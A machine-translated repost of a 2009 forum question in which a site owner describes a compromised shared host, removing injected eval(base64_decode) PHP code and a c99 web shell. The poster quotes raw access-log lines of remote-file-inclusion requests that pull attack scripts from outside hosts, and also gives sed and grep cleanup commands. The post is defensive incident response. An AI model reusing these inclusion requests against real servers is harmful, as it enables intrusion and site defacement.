有一段时间,我的共享托管环境受到威胁,因为我没有保持我安装的应用程序的投资组合.
上周,这是因为一个旧的和未使用的安装了一个名为Help Center Live的
PHP应用程序.
结果是,服务器上的每一个PHP文件(并且我有几个Wordpresses,Joomlas,SilverStripe安装)都添加了代码,从其他站点拉出隐藏的链接,并将它们包含在我的页面中.其他人在这种攻击之后报告他们的网站被禁止 – 幸运的是,我似乎已经足够早了.当我从手机浏览到其中一个网站时,我才注意到这一点 – 该页面上包含了移动浏览器中的链接.
我在日志中发现了很多这样的攻击尝试:
62.149.18.193 – –
[06 / Feb / 2009:14:52:45 0000]
“GET /support/module.php?module=
帮助中心//包括/ main.php?配置
[search_disp] =真安培; include_dir =
http://www.portlandonnuri.com/
2008_web // technote7 /数据/图片/
id2.txt ???
HTTP / 1.1“200 26” – “”libwww-perl / 5.814“
我立即删除了这个应用程序,并写了一个脚本,从每个源文件中删除了违规的PHP代码.我还发现脚本已经创建了包含其他受感染站点的链接的HTML文件.我也删除了他们.现在我担心攻击者可能已经遗漏了我错过的其他东西 – 一个可以让他永久访问的地方的PHP文件.文件日期在攻击中都被修改,我找不到在有问题的时间内更改的任何其他文件.有没有什么明显的,我错过了,以确保在我的服务器上没有后门?
编辑:我还搜索包含攻击代码的文本文件,如上面的日志文件片段所示.我没有找到.
另一个编辑:
如果你碰巧遇到这个帖子,因为你发现自己处于相同的情况,也许这将有助于你.我用它来备份我的所有PHP源文件,然后再操作它们:
find . -name *.php -exec tar -uvf ~/www/allphp.tar {} \;
这样可以消除攻击者所做的更改:
find . -name *.php -exec sed -i '/<?php \/\*\*\/eval(base64_decode(/d' {} \;
不是火箭科学,但对于偶尔的Linux / Unix用户来说,不是微不足道的,就像我自己一样:-).
另一个编辑:
我无法审核服务器上的每行代码,但我可以搜索可疑数据.
我搜索了所有的“eval”和“base64”的发生,没有发现任何看起来不合法的东西.
我然后为“.ru”打了一个grep(因为肇事者似乎是从那里来的),而且我发现我发现了一个叫做c99的shell,我被迅速的删除了.
最终编辑:
我发现c99 shell是如何上传的 – 通过Coppermine照片库的一个洞.
97.74.118.95 - - [03/Feb/2009:00:31:37 +0000] "POST
/pics/picEditor.php?img_dir=http://xakforum.altnet.ru/tmp_upload/files
/c99shell.txt&CURRENT_PIC[filename]=/1.php HTTP/1.1" 404 - "-" "-"
97.74.118.95 - - [03/Feb/2009:00:32:24 +0000] "
GET /pics/albums/1.php HTTP/1.1" 200 25352 "-" "-"
IP地址btw是Godaddy托管的IP.
355
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
